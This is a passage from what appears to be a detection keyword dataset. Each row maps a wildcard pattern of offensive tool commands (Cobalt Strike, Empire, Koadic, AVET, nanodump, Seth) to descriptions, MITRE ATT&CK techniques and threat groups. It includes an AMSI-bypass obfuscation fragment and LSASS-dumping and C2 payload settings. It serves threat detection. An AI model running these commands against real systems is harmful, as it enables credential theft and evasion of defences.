emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*set obfuscate *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set payload *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*set PAYLOAD *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*set pipename *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set Profile apt1.profile*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*set shellcode *,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*set smartinject*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set userwx*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,0,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*set zombie *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*set_child werfault.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set_command_exec exec_via_cmd*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_command_exec exec_via_powershell*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_command_exec no_command*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_command_source download_bitsadmin*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_decoder xor*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_empty_pw.py*,offensive_tool_keyword,POC,Zerologon CVE exploitation,T1210 - T1068,TA0001,N/A,N/A,Exploitation tools,https://github.com/risksense/zerologon,1,1,N/A,N/A,6,555,144,2020-10-15T18:31:15Z,2020-09-14T19:19:07Z -*set_injection_technique*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*set_logon_script.py*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -*set_objectpipe \\*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*set_payload_execution_method exec_shellcode64*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_payload_execution_method inject_dll*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_payload_info_source from_command_line_raw*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_payload_source download_powershell*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_rpc_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*set_shellcode,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*set_svchost_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*set_wmi_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*set_wmiconfig \*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*setc_webshell*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*Set-DCShadowPermissions*,offensive_tool_keyword,AD exploitation cheat sheet,DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Set-DCShadowPermissions*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Set-DesktopACLToAllow*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Set-DomainObject*,offensive_tool_keyword,AD exploitation cheat sheet,Targeted kerberoasting by setting SPN,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Seth by SySS GmbH*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*seth.py * -j INJECT*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*Seth-master.zip*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,1,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*,offensive_tool_keyword,AD exploitation cheat sheet,PowerShell AMSI Bypass Obfuscation example for copy-paste purposes,T1548 T1562 T1027,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*,greyware_tool_keyword,Excel,"prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new - Microsoft Excel feature that allows Python to run within the spreadsheet",T1112 - T1131 - T1204.002,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml,1,0,N/A,7,1,88,10,2023-09-13T20:39:02Z,2022-01-11T07:34:37Z -*set-killdate *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Set-Killdate*,offensive_tool_keyword,empire,empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*setLoaderFlagZero*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*Set-MacAttribute.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - 